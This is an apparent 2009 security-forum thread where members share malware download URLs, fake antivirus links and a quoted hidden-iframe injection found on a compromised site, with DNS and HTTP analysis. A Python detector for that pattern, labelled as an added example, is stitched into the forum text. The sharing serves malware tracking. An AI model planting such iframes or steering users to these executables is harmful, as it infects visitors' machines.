Author Topic: daily something......  (Read 832717 times)


June 28, 2009, 07:26:06 pm
Reply #480

cjeremy

Some more fun:



June 28, 2009, 09:54:04 pm
Reply #481

PaJamis

Quote
hxxp://dcvs.chc.edu.tw/classfix/default.asp (Mal/Iframe-I)

June 28, 2009, 10:04:31 pm
Reply #482

MysteryFCM

Can you double-check that one please? (hostname is failing to resolve from several locations over here)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 29, 2009, 12:12:11 pm
Reply #483

promised

Code:
liesbethmilan.be/1/captcha6.exe
liesbethmilan.be/1/ms.19.exe

June 29, 2009, 01:32:28 pm
Reply #484

CM_MWR


June 29, 2009, 02:17:24 pm
Reply #485

philipp

Quote
Can you double-check that one please? (hostname is failing to resolve from several locations over here)

Add a www to it, or Google the domain name, but there is more than just that one and I can't see where any exploits popped out.   ???

After the closing html tag, I see the following:
Code:
<iframe src=http://www.3prince.com/kmdr/guest/images/_vti_cnf/tt/rp.htm width=30 height=0><div style="position: absolute; top: -999px;left: -999px;">
��������:
<a href="http://www.kryiyi.com">����һ��˽���l��վ</a>
<a href="http://www.61hj.com">Ӣ�ۺϓ�˽���l��վ</a>
<a href="http://www.reeltop.com">�ڿͽ��׾W</a>
<a href="http://www.941fc.com">����Ҫ�l??Ӱ�W</a>
<a href="http://www.ddoscc.cn">DDOS������,CC������˽�����������W�ɹ�����</a>
<a href="http://www.10004y.cn">�@���ӵ�˽��</a>
<a href="http://www.gfsj.org.cn">��������˽��</a>
<a href="http://www.3ky.org.cn">DDOS����?����DDOS���Rԭ����DDOS��������������ddos��������IP������</a>
<a href="http://1104f.cn">�@���ӵ�</a>
</div>

The iframed URL returns HTTP status code 404. I guess this is where the exploits came from.

Most of the hosts resolve to 61.160.213.47, except for
w ww.941fc.com (NXDOMAIN)
w ww.ddoscc.cn (CNAME url.xundns.net -> 120.72.34.251)
w ww.10004y.cn (58.252.208.172)

w ww.ddoscc.cn returns:
Code:
HTTP/1.1 200 OK
Date: Mon, 29 Jun 2009 13:53:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 64
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCATCSDAA=DAOPAKFAOJEIFGHFMGKLFDLD; path=/
Cache-control: private


<meta http-equiv="refresh" content="0;url=http://ddoscc.cn">
ddoscc.cn again resolves to 61.160.213.47.

Trying to access these hosts on 61.160.213.47 always ends with the connection being interrupted/reset by the server.

w ww.10004y.cn does not contain anything malicious from a quick look.
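Detection logic for the injection pattern philipp describes above (markup appended after the closing html tag, a zero-height iframe, an absolutely positioned div pushed off-screen), as an added example that is not from the thread; the hostnames in the constructed sample are placeholders.

```python
"""Added example (not from the thread): flag appended-after-</html> markup,
zero-height iframes and off-screen divs in a fetched HTML document."""
import re
from html.parser import HTMLParser


class InjectionScanner(HTMLParser):
    """Collect iframes with a zero dimension and divs positioned far off-screen."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # unquoted attributes (width=30 height=0) parse fine
        if tag == "iframe":
            h = (a.get("height") or "").strip().rstrip("px")
            w = (a.get("width") or "").strip().rstrip("px")
            if "0" in (h, w):
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "div":
            style = (a.get("style") or "").lower()
            # top:-999px / left:-999px offsets move the block out of the viewport
            if "position" in style and re.search(r"(top|left)\s*:\s*-\d{3,}px", style):
                self.findings.append(("offscreen-div", style))


def scan_page(html):
    """Return a list of (finding, detail) tuples for one HTML document."""
    findings = []
    # Content after the closing </html> tag is a common sign of an appended injection.
    parts = re.split(r"</html\s*>", html, maxsplit=1, flags=re.IGNORECASE)
    if len(parts) == 2 and parts[1].strip():
        findings.append(("trailing-markup", parts[1].strip()[:60]))
    p = InjectionScanner()
    p.feed(html)
    findings.extend(p.findings)
    return findings


# Constructed sample: a benign page followed by the injected block (placeholder hosts).
SAMPLE = """<html><body><p>hello</p></body></html>
<iframe src=http://iframe.example/rp.htm width=30 height=0><div style="position: absolute; top: -999px;left: -999px;">
<a href="http://spam.example">x</a></div>"""

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE):
        print(kind, detail)
```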

June 30, 2009, 08:33:11 am
Reply #486

CkreM

Mal-Aware

July 01, 2009, 04:25:05 am
Reply #487

promised


July 01, 2009, 04:40:56 am
Reply #488

promised


July 01, 2009, 06:15:23 am
Reply #489

CkreM

Fake AV:
Code:
pornotube914.com/scan
atoylev.cn/?wm=70321
Mal-Aware

July 01, 2009, 07:02:53 am
Reply #490

promised

Code:
mvt.c4.fr/a.css
mavr-best.com/ldr/bot.exe

July 01, 2009, 09:15:04 am
Reply #491

promised

Quote
pornotube915.com/codec/.exe
74.52.164.210/pk/bb090621.exe

July 01, 2009, 09:27:46 am
Reply #492

promised

Code:
megavipsite.cn/av/iframe/socks.exe
l3world.ru/l2.exe

July 01, 2009, 01:45:14 pm
Reply #493

promised


July 01, 2009, 02:34:15 pm
Reply #494

promised
